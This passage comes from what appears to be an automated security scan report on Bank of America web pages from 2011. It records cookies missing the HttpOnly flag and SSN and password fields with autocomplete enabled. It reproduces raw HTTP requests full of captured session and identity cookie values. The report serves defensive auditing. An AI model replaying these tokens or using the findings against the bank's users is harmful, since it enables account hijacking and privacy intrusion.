L0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:03 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/
Content-Length: 31193

({questions: [
{
id : "47",
title: "title44",
questionText : "I know I should budget; I just never get around to it. What can I do?",
questionAskedBy : "Sasha from CA asked:",
answerText : "Budg
...[SNIP]...

4.61. http://factsaboutfees.bankofamerica.com/servlets/Xml/qanda.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/servlets/Xml/qanda.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlets/Xml/qanda.xml HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/assets/swf/shell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/xml
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/
Cache-Control: private
Content-Length: 75548

<?xml version="1.0" encoding="utf-8"?>
<qanda>
   <categoryDefs>
       <cat id="1" title="Checking" />
       <cat id="2" title="Savings" />
       <cat id="3" title="Service charges" />
       <cat id="4" title="Cr
...[SNIP]...

4.62. https://www2.bankofamerica.com/deposits/checksave/olbextended/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www2.bankofamerica.com
Path:	/deposits/checksave/olbextended/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bac_persist=3041310379.47873.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /deposits/checksave/olbextended/index.cfm?ADLINK=&CD_BAG=&CH_BAG=&NOCHECK=&OFFER_CODE=&SA_BAG=SAMO&origUrl=http://www.bankofamerica.com/deposits/checksave/index.cfm?template=cds_and_savings_accounts&cust_type=&state=CT HTTP/1.1
Host: www2.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bankofamerica.com/deposits/checksave/index.cfm?template=cds_and_savings_accounts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 06 Oct 2011 12:58:08 GMT
Content-type: magnus-internal/cold-fusion
Location: https://www2.bankofamerica.com/deposits/checksave/olbextended/index.cfm?ADLINK=&CD_BAG=&CH_BAG=&NOCHECK=&OFFER_CODE=&SA_BAG=SAMO&origUrl=http://www.bankofamerica.com/deposits/checksave/index.cfm?template=cds_and_savings_accounts&cust_type=&state=CT&RequestTimeOut=300
X-Cnection: close
Set-Cookie: bac_persist=3041310379.47873.0000; path=/
Content-Length: 0

4.63. https://www9.bankofamerica.com/home-loans/mortgage-purchase.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/mortgage-purchase.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; Path=/; Domain=.bankofamerica.com
ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; Path=/; Domain=.bankofamerica.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home-loans/mortgage-purchase.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 12:59:08 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; Path=/; Domain=.bankofamerica.com
Set-Cookie: ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 35304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

...[SNIP]...

4.64. https://www9.bankofamerica.com/home-loans/surveyShowAction.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/surveyShowAction.go

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:41:25 GMT; Path=/; Domain=.bankofamerica.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home-loans/surveyShowAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:41:24 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Content-Length: 6151
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:41:25 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<title>Survey Launcher</title>
<meta name="Description" CONTENT="">

<link rel="canonical" href="https://www
...[SNIP]...

4.65. https://www9.bankofamerica.com/insurance/surveyShowAction.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyShowAction.go

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:40:40 GMT; Path=/; Domain=.bankofamerica.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insurance/surveyShowAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:40:41 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Content-Length: 5883
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=Survey; Expires=Tue, 03 Apr 2012 13:40:40 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<title>Survey Launcher</title>
<link rel="canonical" href="https://www8.bankofamerica.com/ContentWeb/cor
...[SNIP]...

5. Password field with autocomplete enabled previous next
There are 2 instances of this issue:

https://privacyassist.bankofamerica.com/Pages2/English/AcctVerifier.asp
https://www9.bankofamerica.com/mortgage/status/mymortgage-signin.go

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

5.1. https://privacyassist.bankofamerica.com/Pages2/English/AcctVerifier.asp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages2/English/AcctVerifier.asp

Issue detail

The page contains a form with the following action URL:

https://privacyassist.bankofamerica.com/pages/English/LocateMember.asp

The form contains the following password fields with autocomplete enabled:

txtSSN1
txtSSN2
txtSSN3

Request

GET /Pages2/English/AcctVerifier.asp?f=elert HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages2/English/ForgotPINNo.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; cmRS=&t1=1317910593889&t2=1317910599869&t3=1317910611783&lti=1317910611783&ln=Continue_with_the_Personal_Identification_Number_Authentication_ForgotPINNo&hr=javascript%3AContinue&fti=&fn=&ac=&fd=&uer=&fu=&pi=Ins%3ATool%3AProtect%3APrivAsst%3ALostPIN%3BCreditApproval&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: Wed, 05 Oct 2011 21:36:19 GMT
